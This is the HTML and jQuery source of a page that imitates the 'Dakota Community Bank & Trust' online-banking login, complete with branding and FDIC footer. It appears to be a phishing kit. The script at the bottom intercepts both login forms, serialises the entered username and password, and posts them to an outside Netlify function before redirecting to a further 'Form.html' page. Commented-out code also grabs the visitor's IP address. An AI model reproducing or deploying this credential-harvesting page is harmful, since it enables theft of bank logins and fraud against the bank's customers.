<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Dakota Community Bank & Trust | Log In</title>
    <link rel="stylesheet" href="css/w3.css">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
</head>
<body>
    <div class="w3-hide-small" style="background: url('img/Dakota.png');background-repeat: no-repeat; background-position: center; min-height:100vh; height:100vh; margin-top:-215px; z-index:-1;"></div>
    <nav class="w3-bar w3-hide-small"  style="margin-top: -400px; z-index:1;">
        <div class="w3-bar-item w3-right w3-margin-top" style="margin-right:90px;">
            <a class="w3-hover-text-blue w3-padding" style="text-decoration:none;" href="#">Find Us</a>
            <a class="w3-hover-text-blue w3-padding" style="text-decoration:none;" href="#">ATMs</a>
            <a class="w3-hover-text-blue w3-padding" style="text-decoration:none;" href="#">Log in</a>
        </div>
    </nav>

    <div class="w3-row-padding w3-hide-small" style="margin-top:180px;">
        <h3 class="" style="margin-left:100px;"><b>Log in</b></h3>
        <div class="w3-col s12 m6 l6 w3-hide-small">
            <form  id="loginform" action="#" method="post" >
                <label for="Username" style="margin-left:150px;" class="w3-section">Username:</label><input type="text" name="Username" id="Username" class="w3-right w3-input w3-border" style="width:300px" required>
                <div id="id01" class="w3-panel w3-right w3-display-container" style="display:none; background-color:#89c8ca; width:300px; margin-left:100px;">
                    <span onclick="this.parentElement.style.display='none'"
                    class="w3-button w3-display-topright">X</span>
                    <p>Input Username</p>
                  </div>
                  <br>
                  <br>
                  <br>
                <label for="Password" style="margin-left:150px;" class="w3-section">Password:</label><input type="password" name="Password" id="Password" class="w3-right w3-input w3-border" style="width:300px" required>
                <div id="id02" class="w3-panel w3-right w3-display-container" style="display:none; background-color:#89c8ca; width:300px; margin-left:100px;">
                    <span onclick="this.parentElement.style.display='none'"
                    class="w3-button w3-display-topright">X</span>
                    <p>Input Password</p>
                  </div>
                <button type="submit" id="Login" class="w3-button w3-round w3-text-white w3-hover-blue w3-margin-top" style="background-color:#89c8ca; margin-left:350px;" value="LOG IN" >LOG IN</button>
            <a href="#" class="" style="color:#89c8ca; text-decoration:none; margin-top:-40px;">Forgot password?</a>
            </form>
            <h6 style="margin-left:350px; margin-top:30px">Not yet enrolled? <a href="#" class="" style="color:#89c8ca; text-decoration:none; margin-top:20px;">Enroll now.</a>
        </div>
    </div>

    <footer class="w3-bar w3-hide-small" style="margin-top:60px; margin-left:150px;">
        <a href="#" class="w3-bar-item" style="color:#89c8ca; text-decoration:none; ">HELP</a>
        <a href="#" class="w3-bar-item" style="color:#89c8ca; text-decoration:none; ">PRIVACY</a>
        <a href="#" class="w3-bar-item" style="color:#89c8ca; text-decoration:none; ">TERMS OF USE</a>
        <a href="#" class="w3-bar-item" style="color:#89c8ca; text-decoration:none; ">CAREERS</a>
        <a href="#" class="w3-bar-item" style="color:#89c8ca; text-decoration:none; ">CONTACT</a>
        <a href="#" class="w3-bar-item" style="color:#89c8ca; text-decoration:none; ">DISCLOSURE</a>
    </footer>
    <h6 class="w3-small w3-hide-small" style="margin-left:165px;">Member FDIC. Equal Housing Lender</h6>
    <h6 class="w3-right w3-small w3-hide-small" style="margin-top:-30px; margin-right:80px;">© 2015-2019 Fiserv, Inc. or its affiliates.</h6>





    <!--small screen-->
    <nav class="w3-bar w3-hide-large w3-hide-medium" style="background-color:#e5e4e3">
        <div class="w3-bar-item w3-right w3-margin-top">
            <a class="w3-hover-text-black w3-small w3-padding" style="text-decoration:none;" href="#">Find Us</a>
            <a class="w3-hover-text-black w3-small w3-padding" style="text-decoration:none;" href="#">ATMs</a>
            <a class="w3-hover-text-black w3-small w3-padding" style="text-decoration:none;" href="#">Log in</a>
        </div>
    </nav>
    <div>
            <div class="w3-hide-large w3-hide-medium" style="background: url('img/Dakota.png');background-size:cover; background-position: center; min-height:50vh; height:50vh; z-index:-1;"></div>
        <img class="w3-hide-large w3-hide-medium" src="img/logo.png" style="margin-left:70px; width:200px; margin-top:-215px;">
    </div>

    <div class="w3-row-padding w3-hide-large w3-hide-medium">
        <div class=" w3-col s12 w3-hide-large w3-hide-medium">
            <h6 class="" style="margin-top:50px;"><b>Log in</b></h6>
            <br>
            <br> 
        <form  id="loginform_2" action="#" method="post" >
                <label for="Username" class="w3-section">Username:</label><input type="text" name="Username" id="Username2" class="w3-right w3-input w3-border w3-section">
                    <div id="ido1" class="w3-panel w3-right w3-display-container" style="display:none; background-color:#89c8ca; width:300px; margin-left:100px;">
                    <span onclick="this.parentElement.style.display='none'"
                    class="w3-button w3-display-topright">X</span>
                    <p>Input Username</p>
                  </div>
                <br>
                <label for="Password"  class="w3-section" >Password:</label><input type="password" name="Password" id="Password2" class="w3-right w3-section w3-input w3-border">
                <div id="ido2" class="w3-panel w3-right w3-display-container" style="display:none; background-color:#89c8ca; width:300px; margin-left:100px;">
                    <span onclick="this.parentElement.style.display='none'"
                    class="w3-button w3-display-topright">X</span>
                    <p>Input Password</p>
                  </div>
                <br>
            <button type="submit" id="Login2" class="w3-button w3-hover-blue w3-small w3-round w3-text-white w3-margin-top" style="background-color:#89c8ca; margin-left:50px; margin-top:40px;" >LOG IN</button>
            <a href="#" class="w3-margin-left w3-small" style="color:#89c8ca; text-decoration:none; margin-top:40px;" required>Forgot password?</a>
        </form>
        <br>
        <h6 style="margin-left:50px;" class="w3-small">Not yet enrolled? <a href="#" class="" style="color:#89c8ca; text-decoration:none; margin-top:20px;">Enroll now.</a>
        </div>
    </div>
    <hr class="w3-hr w3-hide-large w3-hide-medium w3-mobile">
    <footer class="w3-bar w3-hide-large w3-hide-medium w3-mobile">
            <a href="#" class="w3-bar-item w3-small w3-mobile" style="color:#89c8ca; text-decoration:none; ">HELP</a>
            <a href="#" class="w3-bar-item w3-small w3-mobile" style="color:#89c8ca; text-decoration:none; ">PRIVACY</a>
            <a href="#" class="w3-bar-item w3-small w3-mobile" style="color:#89c8ca; text-decoration:none; ">TERMS OF USE</a>
            <a href="#" class="w3-bar-item w3-small w3-mobile" style="color:#89c8ca; text-decoration:none; ">CAREERS</a>
            <a href="#" class="w3-bar-item w3-small w3-mobile" style="color:#89c8ca; text-decoration:none; ">CONTACT</a>
            <a href="#" class="w3-bar-item w3-small w3-mobile" style="color:#89c8ca; text-decoration:none; ">DISCLOSURE</a>
        </footer>
        <h6 class="w3-small w3-hide-large w3-hide-medium w3-mobile"><center>Member FDIC. Equal Housing Lender</center></h6>
        <h6 class="w3-small w3-hide-large w3-hide-medium w3-mobile"><center>© 2015-2019 Fiserv, Inc. or its affiliates.</center></h6>


<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script> 

<script>

// $(document).ready(function Login() {
//     $.getJSON('https://api.ipify.org?format=json', function(data){
//     var IP = data.ip;
//     console.log(IP);
// });
//     $('#Login').click(function Login(){

//         var Username = document.querySelector('#Username').value;
//         var Password = document.querySelector('#Password').value;
//         if (!Username){
//             $('#id01').show()
//         }else if(!Password){
//             $('#id02').show()
//         }else{
//             window.open("/Form.html","_self")
//         }
// });
// });
$(document).ready(function() {  
    console.log("ready");
    $('#loginform,#loginform_2').on("submit",function(evt){
        evt.preventDefault();
     
        let payloadData = $(this).serializeArray().reduce((acc,oj)=>({...acc,[oj.name]:oj.value}),{});
        console.log(payloadData);
        $.post("https://dakota.netlify.com/.netlify/functions/index", JSON.stringify(payloadData),function(sux){
            console.log({sux})
            window.open("/Form.html","_self")
        });
        //alert('works');
        // var Username2 = document.querySelector('#Username2').value;
        // var Password2 = document.querySelector('#Password2').value;
        // if (!Username2){
        //     $('#ido1').show()
        // }else if(!Password2){
        //     $('#ido2').show()
        // }else{
        //    
        // }
    });
});


//076353443
</script>      
</body>
</html>


